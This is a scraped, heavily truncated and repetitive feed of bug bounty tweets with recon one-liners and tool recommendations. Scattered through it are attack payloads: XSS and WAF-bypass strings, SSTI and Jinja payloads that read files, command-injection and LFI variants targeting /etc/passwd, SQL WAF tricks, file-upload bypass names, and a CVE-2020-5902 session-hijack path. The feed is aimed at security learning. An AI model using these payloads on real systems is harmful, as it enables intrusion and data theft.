@gkhck_ from our community, wrote a write-up about the xss recon methodology!
https://t.co/FukL4nlNvc
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip
RT @praseudo: Want to know which web files on a website are cached? Here is an online
https://t.co/YQJaWQBEps
#bugbounty #bugbountytips #hacking #Recon #recontips #bugbountytools https://t.co
RT @niravsikotaria: Dear @pdiscoveryio 😍
Thanks for "httpx" tool works like Jet Plane🚀
#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips #httpx
RT @m4ll0k2: Simple tool for get domain relationship.. https://t.co/MuLnPJH5SQ - @Jha
RT @harshbothra_: Simple Oneliner to Filter out Domains with "200 Status" and further
cat domains.txt | httpx -follow-redirects -status-code -vhost -threads 100 | sort -u | gre
#bugbountytips #bugbounty #security #infosec
RT @harshbothra_: Found an API Key/Secret/Token - Not Sure whether to report it or n
@udit_thakkur Thanks for a good tool ;)
#bugbounty #bugbountytip #bugbountytips https://t.co/LFEbSVE9PN
RT @gwendallecoguic: #onliner to extract endpoints from JS files of a given host #BugB
Regexp dependant so highly improvable!
https://t.co/4kBajZpIV8 https://t.co/T7F7tYaG0Q
RT @11xuxx: LFI to RCE
1. ffuf on "/" -> "redacted-api" -> 302
2. ffuf on "redacted-api/" -> "application.wadl" -> 200
3. all operations were auth protected
4. didn't give up and tested ~200 operations
5. fount LFI, no auth
6. admin creds in plaintext, logged in and got RCE
#bugbountytips https://t.co/1LUz8GyaZB
RT @pdnuclei: Here is how you can use #httpx to import a list of
a) URLs
b) Subdomains
c) Endpoints
to Burp suite for further crawling or scanning.
#bugbountytips #pentest #security #hackwithautomation #burpsuite https://t.co/jjxcK
RT @AbhishekKarle3: I just published How I was able to change victim’s password using
Thanks to @musiclouderlml for sharing #bugbountytips
RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @Tismayil1: Imperva Waf XSS ByPass :
Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9
Codepen : https://t.co/0ot0RTvp39
#BugBounty #BugBountyTip #BugBountyTips #WhiteHats https://t.co/kFIWRcOQWW
RT @Random_Robbie: <?php var_dump(explode(',',ini_get('disable_functions'))); ?&g
Handy as hell tip for checking which functions you need to by pass on PHP RCE.
#bugbountytips #bugbountytip
RT @hacktory1: 6 steps and 2 tools to attack JSON Web Token
https://t.co/uRHKNn6pSW
https://t.co/PBDNgsjLnh
#hacktory_tools #bugbounty #cybersecurity #bugbountytip #bugbountytips #cybersec
How to Answer tricky Javascript Interview Questions | Weird Javascript | https://t.co/c
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @chiraggupta8769: one-liner to extract endpoints from JavaScript files by @renniepa
cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s
#bugbountytips #bugbountytip #bugbounty https://t.co/xk345N4yXN
RT @SalahHasoneh1: ️Way to bypass 2FA ️
️️
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht
RT @vNature0: Could you please recommend tools/scripts to test for known vulnerabilit
My website has been receiving some attempts of doing random stuff from Russia so I wa
Thanks!!
#bugbountytips #bugbountytip
Could you please recommend tools/scripts to test for known vulnerabilities?
My website has been receiving some attempts of doing random stuff from Russia so I wa
Thanks!!
#bugbountytips #bugbountytip
RT @roughwire: Duplicates specially RCE on bugbounty program makes you feel hell.
#bugbountytips never check your hackerone notification before going to bed specially w
RT @dark_warlord14: New write up around ffuf to help you speed up few things during p
Blog: https://t.co/NucgVotBwn
I hope it helps you in someway. Retweet if you like. Happy Hacking!!
#bugbounty
#bugbountytips https://t.co/K9MPwR3EX8
RT @MrrFawadkhann: Eid Mubarak to everyone
#bugbountytips #BugBounty
Eid Mubarak to everyone
#bugbountytips #BugBounty
RT @Tismayil1: Yes I awarded 5000$ in Private Program.
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty
- SQL'injection with WAF ByPass
If you find the host IP address of the target. You can remove the WAF by sending a requ
If the host accepts requests directly. https://t.co/wj82tcFJXb
RT @11xuxx: Using ffuf the right way and gaining admin access
1. "ffuf -u ... --mc all" -> match all response codes
2. ctrl+c after 5 sec
3. "ffuf -u ... --mc all -fw ..."
4. found a backdoor developer used to login as admin (response code 404)
all credits goes to @joohoi
#bugbountytips https://t.co/0id7geVEyE
Wait !! Are you serious? are you going to help ppl to learn smt could really make an impa
Once I realized the trick to @adamtlangley's "I once was blind but now I RFC" challenge
TIL @PortSwigger's Burp Collab does SMTP!
This is insaaanely useful.
#bugbounty #bugbountytips https://t.co/1Xdo79FEUG
RT @shreyasrx: Command injection 💥
Filter Bypasses >
1/3
cat /etc/passwd
cat /e"t"c/pa"s"swd
cat /'e'tc/pa's' swd
cat /etc/pa??wd
cat /etc/pa*wd
cat /et' 'c/passw' 'd
cat /et$()c/pa$()$swd
#bugbountytips
#shieldindia
#commandinjection
RT @abhishake100: I just published "Bug Bounty in Lockdown (SQLi and Business Logic
#bugbounty #bugbountytips
https://t.co/MbpxArExBD
RT @CristiVlad25: Tools for #bugbounty hunters. With @InsiderPhD
#bugbountytips #bughunting #ethicalhacking
https://t.co/SAJb6TjKMm
Tools for #bugbounty hunters. With @InsiderPhD
#bugbountytips #bughunting #ethicalhacking
https://t.co/SAJb6TjKMm
RT @D0rkerDevil: Escalated a blind python code injection to
rce , Thanks to @imhaxormad for the help.
another #DNS_BASED_EXFILTRATION
just decode the output from base64
and you will get
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/
#bugbounty #dnsexfil #bugbountytips https://t.co/YYr8H5h6Qz
RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
Top 25 Remote Code Execution (RCE) Parameters
#bugbountytips #bugbountytip #bugbounty https://t.co/2JI8LraxWV https://t.co/uL0
️️Ways to bypass rate limit ️
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
- SQL'injection with WAF ByPass
If you find the host IP address of the target. You can remove the WAF by sending a requ
If the host accepts requests directly.
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty https://t.co/HNM
RT @sh0mbo: Need to trigger that xss payload, but parens are filtered? EZ!
Function`return alert````${document.cookie}`
#xss #payload #filterevasion #bugbountytips #bugbounty
RT @joeldeleep: A good way to run linkfinder if you have a list of js files #infosec #bugb
RT @Tismayil1: Yes I earned $3180.
Tools :
Sub Scanner : https://t.co/LegySAU3sZ
Dir Scanner : https://t.co/1L6MutcaEc
Git Dumper : https://t.co/IOsHlTWCP2
#BugBounty
#bugbountytips
#bugbountytip
#whitehat
#infosec https://t.co/6Qy1JEiDWM
RT @Tismayil1: I Earned $XXXX OS Command Injection Private Program.
Used Repos
1 : Dir Searcher : https://t.co/1L6MutcaEc
2 : Sub Scanner : https://t.co/ZRcZb6ovUa
#BugBounty
#bugbountytips
#bugbountytip
#whitehat https://t.co/OPOc6mVkTc
RT @_0nk4r_: Subdomain Takeover 101 ..@EdOverflow Great Blog
learn a lot
https://t.co/xAHIs10wiQ
----
#togatherwelearn #bugbountytips
How to Answer tricky Javascript Interview Questions | Weird Javascript |... https://t.co
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
Duplicates specially RCE on bugbounty program makes you feel hell.
#bugbountytips never check your hackerone notification before going to bed specially w
Here is a way to escape a restricted shell in linux
#bugbountytips
What would you have done to escape a restricted shell? https://t.co/BzI7PLslmb
How to Answer tricky Javascript Interview Questions | Weird Javascript |... https://t.co
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
#programfolback #tutorial #code #opensource
RT @SatyamGothi: #bugbountytips for sure💯
A M A Z I N G #bugbountytips #bugbountytip #infosec https://t.co/sOAjMOXHt5
#bugbountytips for sure💯
RT @d3tonator: Rate limit bypass:
Add header/s with request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
If bypass successful, & after a while blocking request again. Increment the last oct
#infosec #bugbountytips
RT @d3tonator: Easy Money | P3 MAP API | Android
1. Open the apk in Jadx-gui
2. Go to Resources.arsc > res > values > strings.xml
3. Here you'll find the Google Map API Key
4. Open the URL https://t.co/1dNXVN63B4{API_Key}
Map open then report it
#BugBountytips #Android #bugbounty #infosec
Wanna know the best way to be demotivated in the bug bounty field?
Compare yourself with others!
#bugbounty #bugbountytips
RT @InonShkedy: A series of articles I wrote about major changes in app development (
1: Modern vs. Traditional apps:
https://t.co/GUGjFHQWDR
2: What is Modern AppSec:
https://t.co/ewbpqgZFC9
#bugbountytips
RT @farah_hawa01: NEW VIDEO: In this video, I tak about SAML authentication, SSO’s,
https://t.co/erMuqop3vc https://t.co/iAU9QSV0nO
RT @BeingjokerMeme: How to Answer tricky Javascript Interview Questions | Weird Jav
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks
RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
How to Answer tricky Javascript Interview Questions | Weird Javascript |... https://t.co
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
How to Answer tricky Javascript Interview Questions | Weird Javascript |... https://t.co
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks
RT @s3rgiomazari3go: Some of the resources most of the professional people recommen
1.https://t.co/SveHxbs2Nr
2.https://t.co/I8colHHkwB
3.https://t.co/eMCUzhjaqf
#bugbountytips
RT @VirenPawar_: Second medium blog-post:
Stealing your Paytm information using XSS
https://t.co/0UqAhWbzzl
#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring
RT @amad3u6: You can specify memory size for @Burp_Suite to make it more smoother
~$ java -jar -Xmx3072M /path/to/burpsuite.jar
or
~$ java -jar -Xmx3G /path/to/burpsuite.jar
#bugbountytips #bugbountytip #bugbounty #infosec
RT @HossamSec: To test XSS + SQLi + SSTI/CSTI with the same payload use :
'"><svg/onload=prompt(5);>{{7*7}}
' ==> for Sql injection
"><svg/onload=prompt(5);> ==> for XSS
{{7*7}} ==> for SSTI/CSTI
#bugbounty #infosec #TogetherWeHitHarder #bugbountyprotip #Pentesting #bugboun
RT @ajdumanhug: I'll tag #BugBountyTips to notify #SecurityResearchers. Go check out
I'll tag #BugBountyTips to notify #SecurityResearchers. Go check out these platforms an
RT @SalahHasoneh1: ️Extract endpoints from APK files ️
️️
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
#bugbountytips #BugBounty https://t.co/7pxhZ6gRgo
https://t.co/IqiCVzbCkd MR r0b0t.clip >>> #blockchain #opensource #linux #
Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot
#bugbountytips #BugBounty #bugbountytip https://t.co/Rf4Vfwmfp2 https://t.co/Lu
Bug bounty fast hunting find all subdomains using all tools and then use all endpoint gra
RT @HackerOn2Wheels: Content Type Forcing - The XSS you may have missed.
This is my quick and practical blog post on how to get XSS in responses with Content-Ty
https://t.co/LgaPBZuAR4
#bugbounty #bugbountytip #BugBountyTips #infosec
Tutorial on privilege escalation and post exploitation tactics
in Google Cloud Platform environments:(PDF) 66 PAGES:
https://t.co/6LGDGTiI0m
#PenTest #Hacking #bugbountytips #redteam
RT @0xrudrapratap: @intigriti #bugbountytips
@intigriti #bugbountytips
RT @sw33tLie: Friendly reminder that zdns > massdns #bugbountytips
RT @LooseSecurity: I once exploited SSTI in flask app with payload:
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40](\"/tmp/flag\").r
If you find SSTI, you NEED to show how to exploit! Reading files is perfect. #bugbountyt
payload not by me
Dear @pdiscoveryio 😍
Thanks for "httpx" tool works like Jet Plane🚀
#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips #httpx
Bypass CSRF like a boss. Seven ways to bypass CSRF security by @harshbothra_
https://t.co/F6IYxtD5Xa
#csrfbypass #bugbounty #cybersecurity #bugbountytips
RT @AmitMDubey: A small Burpsuite trick which helped me to find Blind SSRF -
Step 1: Use Intruder to Bruteforce Headers
Step 2: Add Burp collaborator URL as value.
Step 3: Add prefix numerical payload (Pitchfork)
Step 4: Use Tarborator Extension to monitor hits
#bugbounty #bugbountytips https://t.co/lLzBZf5KZU
RT @secalert: Regarding CVE-2020-5902:
[https://{host}]/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?director
there you will see the session files like:
"sess_XXYYXXYYXXYYXXYYXXYYXXYYXX".
Set this in the cookie and you are in admin's session. #bugbountytips
RT @hackison: #bugbounty #bugbountytip #bugbountytips #hacking #hackison #hacke
Find SSRF issues via inject headers (like x-forwarded-host,..etc) with this tool:
.
https://t.co/C2E8XUKGRz
#bugbountytips #bugbounty https://t.co/OEkYLIt3YE
RT @C1h2e11: A tips from Nahamsec @NahamSec
curl -X GET https://t.co/pIuaaFEPZL{organization}
https://t.co/5XaiHYznhj{organization}
https://t.co/7AlvIjzWht{IP address}
Shodan search query ASN:{ASN}
#bugbountytip #bugbountytips https://t.co/RGdbP6rj4u
RT @HusseiN98D: WooT! There is always a way. New #bugbounty #pentest short write u
https://t.co/nlAv4pMPhx
RT @HusseiN98D: A 2 year old RCE on a @Hacker0x01 program. Next post at 400 RT! AL
I'm interested in any security research team / pentest work (remote). If any company/t
Finding for API keys, Tokens and Passwords with Github Dorks
#bugbounty #bugbountytips https://t.co/lOS0parDCn
RT @SpiderSec: 2FA Bypass Technique
#bugbounty #bugbountytips https://t.co/l0bB4NVGZl
RT @1m4xx0: And sometimes for (LFI)
url?para=//..//..//..//..//..//..//..//..//etc//passwd//
Works!!
#bugbountytip
#BugBounty
#bugbountytips
#bugbounty
RT @ja1sharma: Infosec meme for BugBounty hunters.
#Bugbounty #BurpSuite #Scanner #bugbountytips #infosec #MEMES #XSS #SQLi https
Shellshock still work for some server you can also try
nmap script.
Nmap -sV -sC -v -T4 --script http-shellshock -p 443,80 <target>
#bugbountytips #bugbounty https://t.co/hWfe6AZWsi
RT @malcolmx0x: host:attacker,com>> blcoked
host:attacker,com
x-forwarded-host:target,com>>ATO
#bugbountytips
RT @HossamSec: Add this endpoint to your DIRs list You may get lucky and access a das
/uplynk/examples/dash.html
Make your own private lists of DIRs while hunting and you may get lucky and access crit
#BugBountyTips #infosec https://t.co/nfI5oSQ4jW
RT @HusseiN98D: Analysis of an RCE I found past week. RT and Like if you want more! I
Part 1: https://t.co/gQHKx5lpas
Part 2: https://t.co/TcnApVmJP7
#bugbountytips #bugbounty
RT @Santhoshvr97: use file:// instead of http:// in parameter.
sometimes it will bypass URL restrictions while redirect in page and use this payload to
it will work.. ✌️
Payload: file:///</script><script>alert(1)</script>
#bugbounty #bugbountytips #infosec
#xss
RT @anspattnaik: #bugbountytips #BugBounty
Just exploit template injection vulnerability {{7*7}} = 49
and I m pretty sure it's using Jinja2 template but when I trying below payload results ar
{{[].__class__.__base__.__subclasses__().pop(40)('etc/passwd').read() }}
any suggestions?
RT @Sahad_nk: Found a JIRA SSRF and want to make it more impactful? Look for what's
#BugBounty #BugBountyTips #HackerOne #BugCrowd #Synack https://t.co/LtTsSpokH
RT @hackison: [Sensitive Directories] intitle:"Index of" wp-config.php
[Sensitive Directories] intitle:index.of./.sql
[Pages Containing Login Portals] site:*/cgi-bin/login.html
[Various Online Devices] inurl:ftp://ftp robots.txt
#dorks #hacking #bugbountytip #bugbountytips #pentesting
RT @HusseiN98D: Time for another #BugBountyTip : While testing file upload forms on I
RT @0x240x23elu: Find subdomain CNAME with one liner #bugbountytips #bug #subdom
This is my be old https://t.co/KUPHVhMhct
RT @noobsec_org: Always view the page source code, sometime u get some GOLD like m
#bugbountytips #bugbountytip #OuthackThemAll #ItTakesACrowd #togetherwehithard
RT @HusseiN98D: #BugBountyTip time: combine Arjun from @s0md3v with BurpIntuder
#bugbountytips #pentest RT & L
RT @HusseiN98D: #BugBountyTip time: I've got a RCE by using this tip: while testing fo
Sometime this fools the backend and you get shell! RTs & comments are appreciate
RT @cry__pto: Best #firefox addons for #Hacking:
-HackBar
-Cookies Manager+
-User-Agent Switcher
-Tamper Data
-FoxyProxy Standard
-Wappalyzer:
-HttpRequester
-RESTClient:
-Tampermonkey
-XSS Me
-SQL Inject Me
-iMacros
-FirePHP
#bugbountytips #bugbountytip #hacking #OSINT #pentest
RT @HusseiN98D: #BugBountyTip time: when you see a POST request made with JSON,
Follow, book coming!
RT @TakSec: XSS filter bypass using stripped </p> tag to obfuscate.
P2 Stored XSS $1500 on a private bug bounty program.
XSS Payload:
<</p>iframe src=javascript:alert()//
#xss #bugbountytip #bugbountytips #bugbounty #hacking @brutelogic https://t.co/ltj
RT @bugbountyvillag: Tip by @thedawgyg
When testing for SSRF using a black list, take internal IP addresses and when encoding
#bugbountytip #bugbounty #bugbountytips
RT @YourNextBugTip: All CSRF Bypasses from all over the net.
Last one is the most interested one (bypass XHTTPRequest check using flash), but not e
Did I miss anything?
#bugbountytips #bugbountytip #bugbounty https://t.co/f6VrZlivFz
RT @bugbountynights: You can check Jira Information Disclosure vulnerability (CVE-201
RT @mrunal110: Find CNAME Records #bugbounty #vulnerability #informationsecurity #
#Bugbountytips https://t.co/6EjP0xZQ3b
RT @_Y000_: Ondblclick xss Payloads
<h1 ondblclick=alert`_Y000!_`>_Y000!_</h1>
<marquee ondblclick=alert`_Y000!_`>_Y000!_</marquee>
<xss ondblclick="alert`_Y000!_`" autofocus tabindex=1>_Y000!_</xss>
<w="/x="y>"/ondblclick=`<`[confir\u006d`_Y000!_`]>z
#xss #payloads #bugbountytips
RT @kobsoNinja: Bypassing SSRF Filter using Enclosed Alphanumerics
AWS --> ①⑥⑨.②⑤④.①⑥⑨.②⑤④
Credit: @EdOverflow
#BugBountyTips
RT @ankit_2812: Bugbounty tips#2
Try this MySQL tricks to break some #WAFs out there.
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#SQLi #bypass #bugbountytip #bugbountytips #hackerone #HackThePandemic #hacke
RT @AbdoFarwan: Notes from @NahamSec's awesome interview with @inhibitor181.
#BugBounty
#bugbountytips https://t.co/V9kNVbuxT1
RT @Jhaddix: I know it's common sense but remember when parsing JS for endpoints/fi
/ = Root directory
. = This location
.. = Up a directory
./ = Current directory
../ = Parent of current directory
../../ = Two directories backwards
#bugbountytips ?
RT @HusseiN98D: Simple script to gather all TLDs of a company:
value=$(echo $1|cut -f1 -d.)
echo $value
sed -e "s/^/$value./" /root/wordlist/tld.txt | filter-resolved
Usage: bash https://t.co/ekil2jT7Im https://t.co/PWAspnKSB5
#bugbountytips #bugbountytip https://t.co/HWeUUi3aFu
RT @Yumi_Sec: If a web application allow you to upload a .zip file, zip:// is an interestin
#BugBounty #BugBountyTips #InfoSec https://t.co/gB9uC4vSPw
RT @HusseiN98D: Testing Password Reset Functionnalities . If you can think of other tes
#BugBounty #BugBountyTips #BugBountyTip #pentest https://t.co/esiC6PjUMD
RT @mark_valenzia: Massive thanks to @d0nutptr for his awesome blog on SSRF and @s
#bugbountynoob #bugbountytips https://t.co/2OTvxBLxIe
RT @pwntheweb: Bypassing most FILE Uploads filters for $$$$
* .htaccess <- upload htaccess
* file.svg <- uploading svg = xss
* file.SVg <- must try case mismatch
* file.png.svg
* file.php%00.png
* file.png' or '1'='1
* ../../file.png
* file.'svg <- invalid ext.
#bugbountytips #BugBounty
Done with subdomain enumeration? here is how you can get more assets related to you
#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips https://t.
RT @shreyasrx: Cambium ePMP 1000 Vulnerable for Command execution and changing o
1/2
Google dork >
intitle:ePMP 1000 intext:Log In -site:*.com -site:com.*
A Lot of hosts are still vulnerable.
#bugbountytips
#shieldindia
#Hacking https://t.co/cmclnV5DTh
RT @gwendallecoguic: Short @oneliner to retrieve altnames from ssl certificates. Thanks
https://t.co/t2hyxeD99E https://t.co/uBwdSCnvzI
RT @SalahHasoneh1: ️Price Manipulation Method 3 ️
️️
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht
RT @debangshu_kundu: Just bored.
So posting this poll.
What was the most exciting bug you've ever found?
Doesn't necessarily need to be your highest paid bug!
Vote and comment down below
#bugbounty #hacking #bugbountytips #bugbountytip
#infosec Hashtags for reach XD
I just published Android App Security & Testing https://t.co/cQWTaOqQ5w
It was long pending, found a draft in my notes, corrected it and thought why not share i
#androidsecurity #bugbountytips #bugbounty
RT @_sickwiz: Another govt website. Reported to @NCIIPC . Though they don't offer bou
#bugbountytips #cybersecurity #Ethicalhacking #rvdp #vulnerability https://t.co/Mhua
Another govt website. Reported to @NCIIPC . Though they don't offer bounty but this ap
#bugbountytips #cybersecurity #Ethicalhacking #rvdp #vulnerability https://t.co/Mhua
RT @Jhaddix: #bugbounty #bugbountytips People sometimes ask how you can "eyeball
discovery! https://t.co/PDGu7IHYk3
A series of articles I wrote about major changes in app development (microservices, CI/
1: Modern vs. Traditional apps:
https://t.co/GUGjFHQWDR
2: What is Modern AppSec:
https://t.co/ewbpqgZFC9
#bugbountytips
RT @Debian_Hunter: Best place for understanding Graphql , thnx man #bugbountytips #
RT @0xLupin: That's why you should stop reporting a simple alert box and start thinking
If you don't trust my words trust @MrMustacheMan3 and @brutelogic :)
#hacking #bugbounty #bugbountytips #hacker #XSS #RCE https://t.co/PE8FwIebBp
RT @neutrinoguy: Best way to search Project Sonar database for subdomain enumeratio
https://t.co/t5WYUzjvvp
Credits to @CalumBoal
#bugbountytips
RT @ssh0x00r: thanks a lot 💝,
@NullByte @HackerSploit @LiveOverflow @stokfredrik @Jhaddix @CristiVlad25 @cry__pt
@InsiderPhD @thecybermentor
#bugbountytips #Pentesting #hacking #infosec
thanks a lot 💝,
@NullByte @HackerSploit @LiveOverflow @stokfredrik @Jhaddix @CristiVlad25 @cry__pt
@InsiderPhD @thecybermentor
#bugbountytips #Pentesting #hacking #infosec
RT @BeingBharatiyaa: @AmazonHelp @amazon getting error page by clicking on 'Comm
@AmazonHelp @amazon getting error page by clicking on 'Communication Preferences'
RT @bountyhunter_fr: Subdomain recon tools step by step :
1) amass - scan for subdomains
2) altdns - compute wordlist with result for new subdomains
3) dnsprobe - check if found subdomain is valid
4) nmap - scan subdomain ports
#bugbountytips
RT @AldenAous: Imperva Waf XSS ByPass :
Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9
Codepen : https://t.co/ls37WLuqEK
#BugBounty #BugBountyTip #BugBountyTips #WhiteHats https://t.co/fB2kjCvZVn
RT @OAcybersecurity: FORD Session token URL lead to Reflected XSS #bugbountytips #
RT @sillydadddy: #bugbountytips
Does anyone has list of root domains of all public programs in the BB platforms ?
Could you please share ?
If not I am planning to make one and share
thanks
RT @Rajat_sharma111: Recently, I have started using the tool "Arjun" for finding the hi
Best place for understanding Graphql , thnx man #bugbountytips #bughunting #infosec
“Learning path for Bug Bounty” by Udit Bhadauria https://t.co/NpscvKutUB
#cybersecurity #bugbounty #bugbountytips
RT @adrien_jeanneau: A little #BugBountyTips that I use for my recon: use this Google D
RT @rapiddns: The https://t.co/S8Mkzf3yAd Updates.
Added:
[*] 360 million mx records
[*] Support CIDR format query
[*] Subdomain query matches cname records
Removed:
[*] Recent query
#recon #bugbounty #bugbountytip #bugbountytips #hackerone https://t.co/59wNXBx
RT @s3rgiomazari3go: Note 3: Google Chrome uses an XSS auditor, which when testing
#bugbountytips #infosec #hacking
RT @thedarkwayg: Initial report: Open Redirect+XSS -> Triaged -> Resolved
Check it again and can still "Open Redirect" -> Report and Bounty
The payload: javascript:@youtube.com
Use the ":" character to bypass the filter and "@" to redirect to that domain
#BugBountyTips #BugBounty #ItTakesACrowd https://t.co/PrTMuJqKNA
RT @ryan_kl_ko: #uqcyber PhD student Walt Lin sharing his story on how he discovered
Note 3: Google Chrome uses an XSS auditor, which when testing thinks that you are doin
#bugbountytips #infosec #hacking
RT @cyberdefender5: Successfully Completed ✌✌🏻✌🏻 #Lookingforward #moretocome
#Thanksalot #Akhilbro #Ersegment #Ethicalhackingtraining #Bugbountyhunting #Cybe
Successfully Completed ✌✌
🏻✌🏻 #Lookingforward #moretocome
#Thanksalot #Akhilbro #Ersegment #Ethicalhackingtraining #Bugbountyhunting #Cybe
A good way to run linkfinder if you have a list of js files #infosec #bugbounty #bugboun
RT @Sudhans42246878: It's 6 35 I'm The morning
Couldn't sleep whole night
And now when I have come to bed ....I still can't sleep cause
I am hunting bugs and thinking of all the possible ways I can break into an WebApplicat
Is it a sign I have become one??🙄
#bugbountytips
It's 6 35 I'm The morning
Couldn't sleep whole night
And now when I have come to bed ....I still can't sleep cause
I am hunting bugs and thinking of all the possible ways I can break into an WebApplicat
Is it a sign I have become one??🙄
#bugbountytips
RT @renniepak: Check for stored XSS in emails. The email itself obviously doesn't trigge
RT @Xer0Days: Changed @0xbharath's VirusTotal sub-domains enumeration script. Craw
@appseccouk #bugbountytip #bugbounty #recon #bugbountytips
https://t.co/6JXlkUtURd
#httpx v0.0.7 updates:-
☑Added TLS Probe (Subdomains from SSL)
☑Added Path/File Request support
☑Added Content-type fingerprinting
☑Added Matcher/Filters for Status Code/Length
https://t.co/baW40ThDCi
#hackwithautomation #bugbounty #security #bugbountytips https://t.co/caIs5Uz6Tu
RT @INR_0x0Ma5K: My first Hall of fame for this platform @Bugcrowd, to happy and righ
Most of Duplicate. This one is boosting point for my side.
#bugbountytips #Bounty #hacklearning https://t.co/m87mJH0Krx
My first Hall of fame for this platform @Bugcrowd, to happy and right path to servey. Ple
Most of Duplicate. This one is boosting point for my side.
#bugbountytips #Bounty #hacklearning https://t.co/m87mJH0Krx
#uqcyber PhD student Walt Lin sharing his story on how he discovered a number of CVE
RT @hsakarp_ilajna: #Recon:
1. #Sudomain Scraping- Sublist3r, SubFinder, Amass
2 Subdomain #Bruteforcing- MassDNS with jhaddix_all.txt
3. Subdomain #Permutations scan- #AltDNS
4. #Repeat Step 2 to 3 for 3 times more to find Subs of Subs
#bugbountytips
#cybersecurity #infosec #ethicalhacking
RT @trbughunters: 🚀 CORS Protection RegEx Bypass 🚀
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://
Need to trigger that xss payload, but parens are filtered? EZ!
Function`return alert````${document.cookie}`
#xss #payload #filterevasion #bugbountytips #bugbounty
RT @rnd_infosec_guy: Bug bounty tip: don’t tweet useless bug bounty tips
#bugbountytips
RT @dhakal_ananda: Yay! I earned $100 for a 0 user-interaction Account Takeover Vuln
Try re-registering the user with the same email. If the password gets reset, you got the
#bugbounty #bugbountytips
#PmG - Extract parameters/paths from urls
https://t.co/0Oah7JwH76
#bugbountytips #recon https://t.co/09hZn9fwvq
Yay, My first writeup
I just published Bypassing OTP via reset password
#bugbountytips #bugbounty
https://t.co/N4gSywXvx4
Friendly reminder that zdns > massdns #bugbountytips
Just bored.
